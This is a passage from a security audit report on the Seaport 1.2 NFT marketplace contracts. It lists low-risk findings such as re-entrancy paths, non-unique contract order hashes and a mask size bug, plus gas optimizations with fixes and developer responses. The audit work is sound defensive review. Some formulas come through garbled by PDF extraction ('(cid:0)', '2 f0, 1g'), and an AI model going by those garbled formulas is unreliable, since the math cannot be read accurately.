Recommendation: Document the reason why STOP was used for the 1st opcode. If it's not necessary to have STOP to be the first opcode, use an opcode that reverts calls to TypehashDirectory as it is only used as a data storage contract. Seaport: Fixed in PR 799. Spearbit: Verified. +5.2.4 _isValidBulkOrderSize does not perform the signature length validation correctly. Severity: Low Risk Context: • Verifiers.sol#L122-L125 Description: In _isValidBulkOrderSize the signature's length validation is performed as follows: let length := mload(signature) validLength := and( lt(length, BulkOrderProof_excessSize), lt(and(sub(length, BulkOrderProof_minSize), AlmostOneWord), 2) ) The sub opcode in the above snippet wraps around. If this was the correct formula then it would actually simplify to: lt(and(sub(length, 3), AlmostOneWord), 2) The simplified and the current version would allow length to also be 3, 4, 35, 36, 67, 68 but _isValidBulkOrder- Size actually needs to check that length ( l ) has the following form: where x 2 f0, 1g and y 2 f1, 2, (cid:1) (cid:1) (cid:1) , 24g ( y represents the height/depth of the bulk order). Recommendation: Modify the assembly block to reflect the constraints needed for the above formula: l = (64 + x) + 3 + 32y 20 let z := sub(mload(signature), BulkOrderProof_minSize) validLength := and( lt(z, 738), // 738 = (1 + 32 * 23) + 1, named constant BulkOrderProof_rangeSize lt(and(z, AlmostOneWord), 2) ) • Verification: lt(sub(length, 99), 738) l (cid:0) 99 = l (cid:0) (64 + 3 + 32) = x + 32(y (cid:0) 1) (cid:20) 1 + 32 (cid:1) 23 = 737 < 738 This also takes care of underflows and we end up with a condition that l 2 {99, 100, (cid:1) (cid:1) (cid:1) , 836} lt(and(add(length, 29), 31), 2) (l + 0b11101)&0b11111 2 f0, 1g translates into l + 29 (cid:17) 0, 1(mod32) or l (cid:17) 3, 4(mod32) or l (cid:0) 99 (cid:17) 0, 1(mod32) which enforces l (cid:0) 99 to be of a form x + 32y 0 where x 2 f0, 1g and y 0 2 fZ g. From the first part we know that l (cid:0) 99 2 f0, 1, (cid:1) (cid:1) (cid:1) , 737g and so that would restrict y 0 to be in f0, 1, (cid:1) (cid:1) (cid:1) , 23g And so l = (64 + x) + 3 + 32(y 0 + 1) 2 67 + f0, 1g + 32f1, 2, (cid:1) (cid:1) (cid:1) , 24g Spearbit: The solution mentioned above might be cheaper than PR 797 (depends on the stack juggling by the compiler). Seaport: Leaving it as-is for 1.2 as it's close either way. Spearbit: Verified. +5.2.5 When contractNonce occupies more than 12 bytes the truncated nonce shared back with the contract offerer through ratifyOrder would be smaller than the actual stored nonce Severity: Low Risk Context: • ConsiderationEncoder.sol#L146 • OrderValidator.sol#L385-L387 Description: When contractNonce occupies more than 12 bytes the truncated nonce shared back with the con- tract offerer through ratifyOrder would be smaller than the actual stored nonce: // Write contractNonce to calldata dstHead.offset(ratifyOrder_contractNonce_offset).write( uint96(uint256(orderHash)) ); This is due to the way the contractNonce and the offerer's address are mixed in the orderHash: assembly { orderHash := or(contractNonce, shl(0x60, offerer)) } Recommendation: One can avoid the truncation by using XOR when calculating the orderHash: 21 orderHash := xor(contractNonce, offerer) and sending the full orderHash to the contract offerer's ratifyOrder endpoint: dstHead.offset(ratifyOrder_contractNonce_offset).write(orderHash); The contract offerer can deduct the nonce by XORing its address with the received hash again: nonce := xor(orderHash, address()) This would also make the calculations cheaper. Seaport: Fixed in commit f82012. Spearbit: Verified. +5.2.6 abi_decode_bytes does not mask the copied data length Severity: Low Risk Context: • ConsiderationDecoder.sol#L60 Description: When abi_decode_bytes decodes bytes, it does not mask the copied length of the data in memory (other places where the length is masked by OffsetOrLengthMask). Recommendation: Make sure to also mask the copied length before saving it to the memory. Seaport: Fixed in PR 823. Spearbit: Verified. +5.2.7 OrderHash in the context of contract orders need not refer to a unique order Severity: Low Risk Context: OrderValidator.sol#L386 Description: In Seaport 1.1 and in Seaport 1.2 for non-contract orders, order hashes have a unique correspon- dence with the order, i.e., it can be used to identify the status of an order on-chain and track it. However, in case of contract orders, this is not the case. It is simply the current nonce of the offerer, combined with the address. This cannot be used to uniquely track an order on-chain. uint256 contractNonce; unchecked { contractNonce = _contractNonces[offerer]++; } assembly { orderHash := or(contractNonce, shl(0x60, offerer)) } Here are some example scenarios where this can be problematic: Scenario 1: A reverted contract order and the adjacent succeeding contract order will have the same order hash, regardless of whether they correspond to the same order. 1. Consider Alice calling fulfilledAdvancedOrder for a contract order with offerer = X, where X is a smart contract that offers contract orders on Seaport 1.2. Assume that this transaction failed because enough gas was not provided for the generateOrder call. This tx would revert with a custom error InvalidContrac- tOrder, generated from OrderValidator.sol#L391. 22 2. Consider Bob calling fulfilledAdvancedOrder for a different contract order with offerer = X, same smart contract offerer. OrderFulfiller.sol#L124 This order will succeed and emit the OrderFulfilled event the from In the above scenario, there are two different orders, one that reverted on-chain and the other that succeeded, both having the same orderHash despite the orders only sharing the same contract offerer--the other parameters can be completely arbitrary. Scenario 2: Contract order hashes computed off-chain can be misleading. 1. Consider Alice calling fulfilledAdvancedOrder for a contract order with offerer = X, where X is a smart contract that offers contract orders on Seaport 1.2. Alice computed the orderHash of their order off-chain by simulating the transaction, sends the transaction and polls the OrderFulfilled event with the same orderHash to know if the order has been fulfilled. 2. Consider Bob calling fulfilledAdvancedOrder for any contract order with offerer = X, the same smart contract offerer. 3. Bob's transaction gets included first. An OrderFulfilled event is emitted, with the orderHash to be the same hash that Alice computed off-chain! Alice may believe that their order succeeded. for non-contract Orders, the above approach would be valid, i.e., one may generate and sign an order, Note: compute the order hash of an order off-chain and poll for an OrderFulfilled with the order hash to know that it was fulfilled. Note: even though there is an easier way to track if the order succeeded in these cases, in the general case, Alice or Bob need not be the one executing the orders on-chain. And an off-chain agent may send misleading notifications to either parties that their order succeeded due to this quirk with contract order hashes. Recommendation: 1. Consider computing the order hash for contract orders similarly to how regular orders are hashed. 2. If the same mechanism is maintained, document that using orderHashes as a unique identifier is not reliable. Seaport: Acknowledged. Spearbit: Acknowledged. +5.2.8 When _contractNonces[offerer] gets updated no event is emitted Severity: Low Risk Context: • OrderValidator.sol#L382 • CounterManager.sol#L54 Description: When _contractNonces[offerer] gets updated no event is emitted. This is in contrast to when a counter is updated. One might be able to extract the _contractNonces[offerer] (if it doesn't overflow 12 bytes to enter into the offerer region in the orderhash) from a later event when OrderFulfilled gets emited. OrderFulfilled only gets emitted for an order of CONTRACT type if the generateOrder(...)'s return data satisffies all the constraints. Recommendation: Emit a custom event when _contractNonces[offerer] gets updated if it's important for off- chain agents to monitor this value. Seaport: Acknowledged. Spearbit: Acknowledged. 23 +5.2.9 In general a contract offerer or a zone cannot draw a conclusion accurately based on the spent offer amounts or received consideration amounts shared with them post-trasnfer Severity: Low Risk Context: • ContractOffererInterface.sol#L7 • ContractOffererInterface.sol#L16 • ZoneInterface.sol#L13 • ZoneInteraction.sol#L92 Description: When one calls one of the Seaport endpoints that fulfills or matches a collection of (advanced) orders, the used offer or consideration items will go through different modification steps in the memory. In particular, the startAmount a of these items is an important parameter to inspect: a ! a0 ! b ! a0 a : original startAmount parameter shared to Seaport by the caller encoded in the memory. a0 : the interpolated value and for orders of CONTRACT order type it is the value returned by the contract offerer (interpolation does not have an effect in this case since the startAmount and endAmount are enforced to be equal). b : must be 0 for used consideration items, otherwise the call would revert. For offer items, it can be in [0, 1) (See The spent offer item amounts shared with a zone for restricted (advanced) orders or with a contract offerer for orders of CONTRACT order type is not the actual spent amount in general). a0 : is the final amount shared by Seaport to either a zone for restricted orders and a contract offerer for CONTRACT order types. • Offer Items For offer items, perhaps the zone or the contract offerer would like to check that the offerer has spent a maxi- mum a0 of that specific offer item. For the case of restricted orders where the zone's validateOrder(...) will be called, the offerer might end up spending more than a0 amount of a specific token with the same identifier if the collection of orders includes: • A mix of open and restricted orders. • Multiple zones for the same offerer, offering the same token with the same identifier. • Multiple orders using the same zone. In this case, the zone might not have a sense of the orders of the transfers or which orders are included in the transaction in question (unless the contexts used by the zone enforces the exact ordering and number of items that can be matched/fulfilled in the same transaction). Note the order of transfers can be manipulated/engineered by constructing specific fulfillment data. Given a fulfillment data to combine/aggregate orders, there could be permutations of it that create different ordering of the executions. • An order with an actor (a consideration recipient, contract offerer, weird token, ...) that has approval to transfer this specific offer item for the offerer in question. And when Seaport calls into (NATIVE, ERC1155 token transfers, ...) this actor, the actor would transfer the token to a different address than the offerer. There also is a special case where an order with the same offer item token and identifier is signed on a different instance of Seaport (1.0, 1.1, 1.2, ..., or other non-official versions) which an actor (a consideration recipient, con- tract offerer, weird token, ...) can cross-call into (related Cross-Seaport re-entrancy with the stateful validateOrder call). The above issue can be avoided if the offerer makes sure to not sign different transactions across different or the same instances of Seaport which 1. Share the same offer type, offer token, and offer identifier, 2. but differ in a mix of zone, and order type 24 3. can be active at a shared timestamp And/or the offerer does not give untrusted parties their token approvals. A similar issue can arise for a contract offerer if they use a mix of signed orders of non-CONTRACT order type and CONTRACT order types. • Consideration Items For consideration items, perhaps the zone or the contract offerer would like to check that the recipient of each consideration item has received a minimum of a0 of that specific consideration item. This case also is similar to the offer items issues above when a mix of orders has been used. Recommendation: The above issues and notes should be documented for the users. Document the decision for the current zone and contract offerer interaction patterns. Seaport: Acknowledged. Spearbit: Acknowledged. +5.2.10 Cross-Seaport re-entrancy with the stateful validateOrder call Severity: Low Risk Context: BasicOrderFulfiller.sol#L280 Description: The re-entrancy check in Seaport 1.2 will prevent the Zone from interacting with Seaport 1.2 again. However, an interesting scenario would happen when if the conduit has open channels to both Seaport 1.1 and Seaport 1.2 (or different deployments/forks of Seaport 1.2). This can lead to cross Seaport re-entrancy. This is not immediately problematic as Zones have limited functionality currently. But since Zones can be as flexible as possible, Zones need to be careful if they can interact with multiple versions of Seaport. Note: for Seaport 1.1's zone, the check _assertRestrictedBasicOrderValidity happens before the transfers, and it's also a staticcall. In the future, Seaport 1.3 could also have the same zone interaction, i.e., stateful calls to zones allowing for complex cross-Seaport re-entrancy between 1.2 and 1.3. Note: also see getOrderStatus and getContractOffererNonce are prone to view reentrancy for concerns around view-only re-entrancy. Recommendation: • Document that cross-Seaport re-entrancy can be possible in general, and potentially problematic when paired with the _assertRestricedBasicOrderValidity / validateOrder, and when the conduit has open channels with multiple versions of Seaport. • Avoiding having open channels to both Seaport 1.1, Seaport 1.2 at the same time, or between multiple versions of Seaport. • For Zones with complex logic, consider deploying a new Conduit and carefully consider the risk of opening new channels. Seaport: Acknowledged. Spearbit: Acknowledged. 25 +5.2.11 getOrderStatus and getContractOffererNonce are prone to view reentrancy Severity: Low Risk Context: • Consideration.sol#L548 • Consideration.sol#L607 • OrderValidator.sol#L84-L87 • OrderValidator.sol#L277-L280 • OrderValidator.sol#L284-L287 • OrderValidator.sol#L382 In a Consideration or the Seaport contract, once _orderStatus[orderHash] or _contract- Description: Nonces[offerer] gets updated if there is a mix of contract offerer orders and partial orders are used, Seaport would call into the offerer contracts (let's call one of these offerer contracts X ). In turn X can be a contract that would call into other contracts (let's call them Y ) that take into consideration _orderStatus[orderHash] or _contractNonces[offerer] in their codebase by calling getOrderStatus or getContractOffererNonce The values for _orderStatus[orderHash] or _contractNonces[offerer] might get updated after Y seeks those from Seaport due to for example multiple partial orders with the same orderHash or multiple offerer contract orders using the same offerer. Therefore Y would only take into consideration the mid-flight values and not the final ones after the whole transaction with Seaport is completed. Recommendation: We need to either make sure to update the storage parameters at the end of the call to Seaport order fulfilling/matching endpoints (after all the calls to external contracts) or add _assertNonReentrant() guard to the getOrderStatus and getContractOffererNonce endpoints to avoid other contracts Y to read mid-flight storage parameters. Seaport: Acknowledged. Spearbit: Acknowledged. +5.2.12 The size calculation can be incorrect for large numbers Context: ConsiderationEncoder.sol#L53-L63, ConsiderationConstants.sol#L113 Description: The maximum value of memory offset is defined in PointerLibraries.sol#L22 as OffsetOr- LengthMask = 0xffffffff, i.e., 232 (cid:0) 1. However, the mask OnlyFullWordMask = 0xffffe0; is defined to be a 24-bit number. Assume that the length of the bytes type where src points is 0xffffe0, then the following piece of code incorrectly computes the size as 0. function abi_encode_bytes( MemoryPointer src, MemoryPointer dst ) internal view returns (uint256 size) { unchecked { size = ((src.readUint256() & OffsetOrLengthMask) + AlmostTwoWords) & OnlyFullWordMask; ... This is because the constant OnlyFullWordMask does not have the two higher order bytes set (as a 32-bit type). Note: in practice, it can be difficult to construct bytes of length 0xffffe0 due to upper bound defined by the block gas limit. However, this length is still below Seaport's OffsetOrLengthMask, and therefore may be able to evade many checks. 26 Recommendation: Change the value of OnlyFullWordMask to 0xffffffe0. But it does not fully fix this problem, as if len >= 0xffffffc1, the calculations can encounter the same issues. But these numbers are impractical in the EVM, and therefore may not be of concern. There are two potential approaches to this: 1. Revert early if length is >= 0xffffffc1. This is the value beyond which the add(len, 63) takes more than 32 bits. 2. Or assign a large value for the rounded up length for any values >= 0xffffffc1. 2**32 - 1 is a possibility. The option 1 would be consistent with Solidity generated code--revert early if length is too large for specific opera- tions. Here's the above Z3 proof with the extra constraint that length is below 0xffffffc1. This is now unsatisfiable. from z3 import * def AND(x, y): return x & y def ADD(x, y): return x + y n_bits = 256 symb_len = BitVec('Len', n_bits) const_OnlyFullWordMask = BitVecVal(0xffffffe0, n_bits) const_AlmostTwoWords = BitVecVal(0x3f, n_bits) solver = Solver() # The expression (for ConsiderationEncoder) # from https://github.com/ProjectOpenSea/seaport/pull/798/files expr = AND(ADD(symb_len, const_AlmostTwoWords), const_OnlyFullWordMask) # Add an upper bound about the length solver.add(ULT(symb_len, BitVecVal(0xffffffc1, n_bits))) # A model where the expression evaluates to a `value < 32`. Such model is now unsatisfiable solver.add(ULT(expr, BitVecVal(32, n_bits))) result = solver.check() if result == sat: print("SAT!") print(solver.model()) else: print(result) Seaport: Partially addressed in PR 798. Spearbit: Verified. 27 5.3 Gas Optimization +5.3.1 _prepareBasicFulfillmentFromCalldata expands memory more than it's needed by 4 extra words Severity: Gas Optimization Context: • BasicOrderFulfiller.sol#L896 Description: In _prepareBasicFulfillmentFromCalldata , we have: // Update the free memory pointer so that event data is persisted. mstore(0x40, add(0x80, add(eventDataPtr, dataSize))) OrderFulfilled's event data is stored in the memory in the region [eventDataPtr, eventDataPtr + dataSize). It's important to note that eventDataPtr is an absolute memory pointer and not a relative one. So the above 4 words, 0x80, in the snippet are extra. example, For in test/basic.spec.ts the Seaport memory profile at tract.connect(buyer).fulfillBasicOrder(basicOrderParameters, {value,}) looks like: "ERC721 <=> ETH (basic, minimal and verified on-chain)" case the call of marketplaceCon- the end of test the in 28 0x000 23b872dd000000000000000000000000f372379f3c48ad9994b46f36f879234a ; transferFrom.selector(from, to, id) ,! 0x020 27b4556100000000000000000000000016c53175c34f67c1d4dd0878435964c1 ; ... 0x040 0000000000000000000000000000000000000000000000000000000000000440 ; free memory pointer 0x060 0000000000000000000000000000000000000000000000000000000000000000 ; ZERO slot 0x080 fa445660b7e21515a59617fcd68910b487aa5808b8abda3d78bc85df364b2c2f ; orderTypeHash 0x0a0 000000000000000000000000f372379f3c48ad9994b46f36f879234a27b45561 ; offerer 0x0c0 0000000000000000000000000000000000000000000000000000000000000000 ; zone 0x0e0 78d24b64b38e96956003ddebb880ec8c1d01f333f5a4bfba07d65d5c550a3755 ; h(ho) 0x100 81c946a4f4982cb7ed0c258f32da6098760f98eaf6895d9ebbd8f9beccb293e7 ; h(hc, ha[0], ..., ha[n]) 0x120 0000000000000000000000000000000000000000000000000000000000000000 ; orderType 0x140 0000000000000000000000000000000000000000000000000000000000000000 ; startTime 0x160 000000000000000000000000000000000000ff00000000000000000000000000 ; endTime 0x180 8f1d378d2acd9d4f5883b3b9e85385cf909e7ab825b84f5a6eba28c31ea5246a ; zoneHash > orderHash 0x1a0 00000000000000000000000016c53175c34f67c1d4dd0878435964c1c9b70db7 ; salt > fulfiller 0x1c0 0000000000000000000000000000000000000000000000000000000000000080 ; offererConduitKey > offerer array head ,! 0x1e0 0000000000000000000000000000000000000000000000000000000000000120 ; counter[offerer] > consideration array head ,! 0x200 0000000000000000000000000000000000000000000000000000000000000001 ; h[4]? > offer.length 0x220 0000000000000000000000000000000000000000000000000000000000000002 ; h[...]? > offer.itemType 0x240 000000000000000000000000c67947dc8d7fd0c2f25264f9b9313689a4ac39aa ; > offer.token 0x260 00000000000000000000000000000000c02c1411443be3c204092b54976260b9 ; > offer.identifierOrCriteria 0x280 0000000000000000000000000000000000000000000000000000000000000001 ; > offer's current interpolated amount ,! 0x2a0 0000000000000000000000000000000000000000000000000000000000000001 ; > totalConsiderationRecipients + 1 ,! 0x2c0 0000000000000000000000000000000000000000000000000000000000000000 ; > receivedItemType 0x2e0 0000000000000000000000000000000000000000000000000000000000000000 ; > consideration.token (NATIVE) 0x300 0000000000000000000000000000000000000000000000000000000000000000 ; > consideration.identifierOrCriteria ,! 0x320 0000000000000000000000000000000000000000000000000000000000000001 ; > consideration's current interpolated amount ,! 0x340 000000000000000000000000f372379f3c48ad9994b46f36f879234a27b45561 ; > offerer 0x360 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x380 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x3a0 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x3c0 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x3e0 0000000000000000000000000000000000000000000000000000000000000040 ; sig.length 0x400 26aa4a333d4b615af662e63ce7006883f678068b8dc36f53f70aa79c28f2032c ; sig[ 0:31] 0x420 f640366430611c54bafd13314285f7139c85d69f423794f47ee088fc6bfbf43f ; sig[32:63] 0x440 0000000000000000000000000000000000000000000000000000000000000001 ; fulfilled = 1; // returns ,! (bool fulfilled) Notice that 4 unused memory slots. • Transaction Trace This is also a good example to see that certain memory slots that previously held values like zoneHash, salt, ... have been overwritten to due to the small number of consideration items (this actually happens inside _- prepareBasicFulfillmentFromCalldata). Recommendation: The extra 4 memory slot expansion can be removed from the context in question: // Update the free memory pointer so that event data is persisted. mstore(0x40, add(eventDataPtr, dataSize)) Besides reducing the memory expansion this would also save at least 1 PUSH1 and 1 ADD. Seaport: Fixed in commit e07499. Spearbit: Verified. 29 +5.3.2 TypehashDirectory's constructor code can be optimized. Severity: Gas Optimization Context: • TypehashDirectory.sol#L75 Description: TypehashDirectory's deployed bytecode in its current form is: 00 3ca2711d29384747a8f61d60aad3c450405f7aaff5613541dee28df2d6986d32 ; h_00 bf8e29b89f29ed9b529c154a63038ffca562f8d7cd1e2545dda53a1b582dde30 ; h_01 53c6f6856e13104584dd0797ca2b2779202dc2597c6066a42e0d8fe990b0024d ; h_02 a02eb7ff164c884e5e2c336dc85f81c6a93329d8e9adf214b32729b894de2af1 ; h_03 39c9d33c18e050dda0aeb9a8086fb16fc12d5d64536780e1da7405a800b0b9f6 ; h_04 1c19f71958cdd8f081b4c31f7caf5c010b29d12950be2fa1c95070dc47e30b55 ; h_05 ca74fab2fece9a1d58234a274220ad05ca096a92ef6a1ca1750b9d90c948955c ; h_06 7ff98d9d4e55d876c5cfac10b43c04039522f3ddfb0ea9bfe70c68cfb5c7cc14 ; h_07 bed7be92d41c56f9e59ac7a6272185299b815ddfabc3f25deb51fe55fe2f9e8a ; h_08 d1d97d1ef5eaa37a4ee5fbf234e6f6d64eb511eb562221cd7edfbdde0848da05 ; h_09 896c3f349c4da741c19b37fec49ed2e44d738e775a21d9c9860a69d67a3dae53 ; h_10 bb98d87cc12922b83759626c5f07d72266da9702d19ffad6a514c73a89002f5f ; h_11 e6ae19322608dd1f8a8d56aab48ed9c28be489b689f4b6c91268563efc85f20e ; h_12 6b5b04cbae4fcb1a9d78e7b2dfc51a36933d023cf6e347e03d517b472a852590 ; h_13 d1eb68309202b7106b891e109739dbbd334a1817fe5d6202c939e75cf5e35ca9 ; h_14 1da3eed3ecef6ebaa6e5023c057ec2c75150693fd0dac5c90f4a142f9879fde8 ; h_15 eee9a1392aa395c7002308119a58f2582777a75e54e0c1d5d5437bd2e8bf6222 ; h_16 c3939feff011e53ab8c35ca3370aad54c5df1fc2938cd62543174fa6e7d85877 ; h_17 0efca7572ac20f5ae84db0e2940674f7eca0a4726fa1060ffc2d18cef54b203d ; h_18 5a4f867d3d458dabecad65f6201ceeaba0096df2d0c491cc32e6ea4e64350017 ; h_19 80987079d291feebf21c2230e69add0f283cee0b8be492ca8050b4185a2ff719 ; h_20 3bd8cff538aba49a9c374c806d277181e9651624b3e31111bc0624574f8bca1d ; h_21 5d6a3f098a0bc373f808c619b1bb4028208721b3c4f8d6bc8a874d659814eb76 ; h_22 1d51df90cba8de7637ca3e8fe1e3511d1dc2f23487d05dbdecb781860c21ac1c ; h_23 for height 24 Recommendation: It might be cheaper to pre-calculate the hashes off-chain and unroll the loop used since the length is known (24). If this recommendation is accepted, it should be accompanied by unit and differential tests to guarantee the correctness of the hardcoded hash values. Seaport: Acknowledged. Spearbit: Acknowledged. +5.3.3 ConsiderationItem.recipient's absolute memory offset can be cached and reused Severity: Gas Optimization Context: • OrderCombiner.sol#L388-L391 • OrderCombiner.sol#L402-L405 Description: ConsiderationItem.recipient's absolute offset is calculated twice in the above context. Recommendation: Perhaps we can cache this calculation and reuse it. Seaport: Fixed in commit a13bc2. Spearbit: Verified. 30 +5.3.4 currentAmount can potentially be reused when storing this value in memory in _validateOrdersAnd- PrepareToFulfill Severity: Gas Optimization Context: • OrderCombiner.sol#L375 • OrderCombiner.sol#L406-L411 Description: We have considerationItem.startAmount = currentAmount; // 1 ... mload( // 2 add( considerationItem, ReceivedItem_amount_offset ) ) From 1 where considerationItem.startAmount is assigned till 2 its value is not modifed. Recommendation: It might be cheaper to use currentAmount (depends on the stack juggling by the compiler): considerationItem.startAmount = currentAmount; // 1 ... currentAmount // 2 Seaport: Fixed in PR 828. Spearbit: Verified. +5.3.5 Information packed in BasicOrderType and how receivedItemType and offeredItemType are derived Severity: Gas Optimization Context: • BasicOrderFulfiller.sol#L142-L145 • BasicOrderFulfiller.sol#L149-L155 • ConsiderationEnums.sol#L23 Description: Currently the way information is packed and unpacked in/from BasicOrderType is inefficient. Basi- cOrderType is only used for BasicOrderParameters and when unpacking to give an idea how diffferent parameters are packed into this field. Recommendation: Save gas using bit-packed uint256 in BasicOrderParameters instead: struct BasicOrderParameters { ... uint256 basicOrderType; // 0x124 ... } where the orderType, route, receivedItemType and offeredItemType were packed as: 31 0b 00 ... 00 xx yy zz zz: orderType yy: offeredItemType xx: receivedItemType xxyy: route Then when unpacking these values in _validateAndFulfillBasicOrder, we would only need to do: let orderType := and(3, basicOrderType) let route := and(15, shr(2, basicOrderType)) let offeredItemType := and(3, route) let receivedItemType := and(3, shr(2, route)) And then BasicOrderRouteType would also need to be replaced by a collection of allowed route constants: // RECEIVED_TO_OFFERED = 0x02; // 0b 00 10 uint256 constant ETH_TO_ERC721 = 0x03; // 0b 00 11 uint256 constant ETH_TO_ERC1155 = 0x06; // 0b 01 10 uint256 constant ERC20_TO_ERC721 uint256 constant ERC20_TO_ERC1155 = 0x07; // 0b 01 11 uint256 constant ERC721_TO_ERC20 = 0x09; // 0b 10 01 uint256 constant ERC1155_TO_ERC20 = 0x0d; // 0b 11 01 These constants can be used when routing. We can also add additional/final else block when route is not one of the allowed route constants. This suggestion would save gas, and simplify/remove the complexity of unpacking basicOrderType. Warning: If backward compatibility for frontend/backend is important for these values, one can apply the following when deriving receivedItemType and offeredItemType • receivedItemType Can be simplified to t = (r (cid:29) 1) + (r > 4): receivedItemType := add(shr(1, route), gt(route, 4)) or if the codesize has an extra wiggle room: receivedItemType := byte(route, 0x0000010102030000000000000000000000000000000000000000000000000000) • offeredItemType The expression can be simplified to t = 0b011 (r k(1 + (r < 0b100))): offeredItemType := and(3, or(route, add(1, lt(route, 4)))) or if the codesize has an extra wiggle room: offeredItemType := byte(route, 0x0203020301010000000000000000000000000000000000000000000000000000) Seaport: Acknowledged. Spearbit: Acknowledged. 32 +5.3.6 invalidNativeOfferItemErrorBuffer calculation can be simplified Severity: Gas Optimization Context: • OrderCombiner.sol#L186-L198 Description: We have: func sig ------------------------------------------------------------------------------ 0b10101000000101110100010 00 0000100 0b01010101100101000100101 00 1000010 0b11101101100110001010010 10 1110100 0b10000111001000000001101 10 1000001 ^ 9th bit matchOrders matchAdvancedOrders fulfillAvailableOrders fulfillAvailableAdvancedOrders Recommendation: The expression for invalidNativeOfferItemErrorBuffer can be simplified to save gas: // 231 = 28 * 8 + 7 invalidNativeOfferItemErrorBuffer := and(2, shr(231, calldataload(0))) or even a simpiler (but potentially requires more bytecodes) solution: invalidNativeOfferItemErrorBuffer := and((1 << 232), calldataload(0))) This is dependent on the names and input parameters of these functions and if they get changed, one would need to find a different trick for this calculation. Seaport: Fixed in PR 864. Spearbit: Verified. +5.3.7 When accessing or writing to memory the value of an enum for a struct field, the enum's validation is performed Severity: Gas Optimization Context: • CriteriaResolution.sol#L68 • CriteriaResolution.sol#L98 • CriteriaResolution.sol#L150 • CriteriaResolution.sol#L164 • CriteriaResolution.sol#L189 • CriteriaResolution.sol#L215 • Executor.sol#L58 • Executor.sol#L66 • Executor.sol#L81 • FulfillmentApplier.sol#L84 • OrderCombiner.sol#L675 • OrderCombiner.sol#L781 • OrderFulfiller.sol#L206 • OrderFulfiller.sol#L314 33 • OrderValidator.sol#L134 • OrderValidator.sol#L158 • OrderValidator.sol#L323 • OrderValidator.sol#L593 • ZoneInteraction.sol#L108 • ZoneInteraction.sol#L118 Description: When accessing or writing to memory the value of an enum type for a struct field, the enum's validation is performed: enum Foo { f1, f2, ... fn } struct boo { Foo foo; ... } boo memory b; P(b.foo); // <--- validation will be performed to check whether the value of `b.foo` is out of range This would apply to OrderComponents.orderType, OrderParameters.orderType, CriteriaResolver.side, ReceivedItem.itemType, OfferItem.itemType, BasicOrderParameters.basicOrderType. ConsiderationItem.itemType, SpentItem.itemType, Recommendation: If one would like to avoid these validations, assembly blocks would need to be used instead of high-level Solidity. The ConsiderationDecoder currently skips these validations. If validating these values is required, it would be best to consolidate them into one location and also to make sure the validation only happens once. Seaport: Acknowledged. Spearbit: Acknowledged. +5.3.8 The zero memory slot can be used when supplying no criteria to fulfillOrder, fulfillAvailable- Orders, and matchOrders Severity: Gas Optimization Context: • Consideration.sol#L114 • Consideration.sol#L243 • Consideration.sol#L392 Description: When the external functions in this context are called, no criteria is passed to _validateAndFulfil- lAdvancedOrder, _fulfillAvailableAdvancedOrders, or _matchAdvancedOrders: new CriteriaResolver[](0), // No criteria resolvers supplied. When this gets compiled into YUL, the compiler updates the free memory slot by a word and performs an out of range and overflow check for this value: 34 function allocate_memory_() -> memPtr { memPtr := mload(64) let newFreePtr := add(memPtr, 32) if or(gt(newFreePtr, 0xffffffffffffffff), lt(newFreePtr, memPtr)) { panic_error_0x41() } mstore(64, newFreePtr) } Recommendation: One can avoid incrementing the free memory pointer and the checks by passing the zero memory slot pointer. Seaport: Acknowledged. Spearbit: Acknowledged. +5.3.9 matchOrders, matchAdvancedOrders, fulfillAvailableAdvancedOrders, fulfillAvailableOrders re- turns executions which is cleaned and validator by the compiler Severity: Gas Optimization Context: • Consideration.sol#L441-L452 • Consideration.sol#L385 • Consideration.sol#L334 • Consideration.sol#L234 Description: Currently, the return values of matchOrders, matchAdvancedOrders, fulfillAvailableAdvance- dOrders, fulfillAvailableOrders are cleaned and validator by the compiler. Recommendation: One can use the/a custom encoder to avoid the extra cleanup/validation. Seaport: Acknowledged. Spearbit: Acknowledged. +5.3.10 abi.encodePacked is used when only bytes/string concatenation is needed. Severity: Gas Optimization Context: • ConsiderationBase.sol#L200-L208 • ConsiderationBase.sol#L212-L221 • ConsiderationBase.sol#L225-L239 • ConsiderationBase.sol#L244-L251 • ConsiderationBase.sol#L260-L264 • TypehashDirectory.sol#L27-L35 • TypehashDirectory.sol#L39-L48 • TypehashDirectory.sol#L52-L66 • TypehashDirectory.sol#L94-L100 Description: In the context above, one is using abi.encodePacked like the following: 35 bytes memory B = abi.encodePacked( "", "", ... "" ); For each substring, this causes the compiler to use an mstore (if the substring occupies more than 32 bytes, it will use the least amount of mstores which is the ceiling of the length of substring divided by 32), even though multiple substrings can be combined to fill in one memory slot and thus only use 1 mstore for those. Recommendation: It is recommended to convert the above code snippets to: bytes memory B = bytes( "" "" ... "" ); and for the particular case of TypehashDirectory.sol#L94-L100: bytes memory bulkOrderTypeString = abi.encodePacked( "BulkOrder(OrderComponents", brackets, " tree)", subTypes ); Replace abi.encodePacked with ConsiderationBase.sol#L260-L264). Seaport: Fixed in PR 841. Spearbit: Verified. bytes.concat or string.concat (this rule also applies to +5.3.11 solc ABI encoder is used when OrderFulfilled is emitted in _emitOrderFulfilledEvent Severity: Gas Optimization Context: OrderFulfiller.sol#L378-L385 Description: solc's ABI encoder is used when OrderFulfilled is emitted in _emitOrderFulfilledEvent. That means all the parameters are cleaned and validated before they are provided to log3. Recommendation: We can avoid the clean-up and validation by utilizing the/a custom encoder (ConsiderationEncoder). Seaport: Acknowledged. Spearbit: Acknowledged. 36 +5.3.12 The use of identity precompile to copy memory need not be optimal across chains Severity: Gas Optimization Context: PointerLibraries.sol#L267 Description: The PointerLibraries contract uses a staticcall to identity precompile, i.e., address 4 to copy memory--poor man's memcpy. This is used as a cheaper alternative to copy 32-byte chunks of memory using mstore(...) in a for-loop. However, the gas efficiency of the identity precompile relies on the version of the EVM on the underlying chain. The base call cost for precompiles before Berlin hardfork was 700 (from Tangerine Wistle), and after Berlin, this was reduced to 100 (for warm accounts and precompiles). Many EVM compatible L1s, and even L2s are on old EVM versions. And using the identity precompile would be more expensive than doing mstores(...). Recommendation: If Seaport is aiming to be optimized across chains, then the tradeoff between identity pre- compile v/s mstore(...) needs to be analysed--the overhead of 700 gas may make copies below a certain threshold in words to be more expensive than using mstore(...). However, this optimization need not be worth the maintenance burden. Seaport: Definitely less important (but still desirable) for it to be fully optimized on other chains. We definitely want the source to be consistent across all chains, however! Spearbit: Acknowledged. +5.3.13 Use the zero memory slot for allocating empty data Severity: Gas Optimization Context: 